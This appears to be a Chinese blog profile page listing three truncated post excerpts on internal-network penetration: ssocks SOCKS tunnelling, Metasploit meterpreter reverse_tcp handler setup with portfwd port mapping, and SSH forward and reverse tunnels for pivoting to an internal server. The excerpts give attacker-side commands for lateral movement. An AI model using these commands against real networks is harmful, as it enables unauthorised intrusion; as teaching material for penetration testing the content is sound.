自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 内网渗透-socket隧道

内网渗透之——SOCKET隧道 使用socket工具: 下载地址http://sourceforge.net/projects/ssocks/ 下载至web服务器与攻击主机KALI进行编译 解压tar zxvf ssocks-0.0.14/ 编译进入目录 ./configure 然后执行 make 端口监听(反向代理——服务器连接攻主机) 在攻击主机执行./rcsocks -l 1088 -p 1080 -vv 等待远程socks5服务器访问本地1080端口,创建端口1080与本地端口10

2021-08-18 14:10:12 614

原创 内网渗透-端口转发与映射

内网渗透之——端口转发与端口映射 首先在msf生成后门使用exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.115 set lport 12345 端口映射: protfwd --help 通过访问本机的2020端口访问数据服务器的80端口 在攻击主机执行protfwd add -L 192.168.0.115 -l 2020 -p 80 -r 10.10.10.128

2021-08-18 14:07:43 300 1

原创 内网渗透-SSH隧道

内网渗透之——ssh隧道 网络拓扑图: ssh 正向链接: 在web服务器执行 ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1 在web服务器做端口映射,将数据服务器的80端口映射到web服务器的7777端口,随后访问192.168.0.144:7777即可访问到数据库的80页面。 反向连接: 将web服务器的22端口转发出去到黑客IP web服务器执行: ssh -qTfnN -R 2222:127.0.0.1 root@192.

2021-08-18 14:04:52 489 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除